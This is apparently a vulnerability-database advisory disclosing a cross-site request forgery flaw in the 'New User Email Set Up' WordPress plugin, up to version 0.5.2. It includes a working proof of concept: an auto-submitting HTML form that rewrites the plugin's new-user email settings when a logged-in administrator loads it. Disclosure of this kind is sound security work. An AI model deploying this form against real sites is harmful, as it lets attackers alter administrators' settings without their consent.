WordPress Plugin Vulnerabilities
New User Email Set Up <= 0.5.2 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=new-user-email-set-up%2Fnewuseremailsetup.php" method="POST"> <input type="text" name="option_page" value="nue-options-group"> <input type="text" name="action" value="update"> <input type="text" name="newuseremailhtml" value="text/HTML"> <input type="text" name="newuseremailsubject" value="Welcome to hacked"> <input type="text" name="newuseremailtext" value="hacked "> <input type="text" name="newuseremailfromaddress" value="Enter your admin email here"> <input type="text" name="newuseremailfrom" value="Enter the name you want your admin email sent from here. eg. Admin"> <input type="text" name="nue_submit" value="Save"> <input type="text" name="newuseremailadmin" value="yes"> <input type="text" name="newuseremailadminnotifydiff" value="no"> <input type="text" name="newuseremailadminsubject" value="%blogname% - New User Registration"> <input type="text" name="newuseremailadmintext" value="aaa"> <input type="text" name="cmd" value="_s-xclick"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-23 (about 1 years ago)
Added
2022-05-23 (about 1 years ago)
Last Updated
2023-02-16 (about 1 years ago)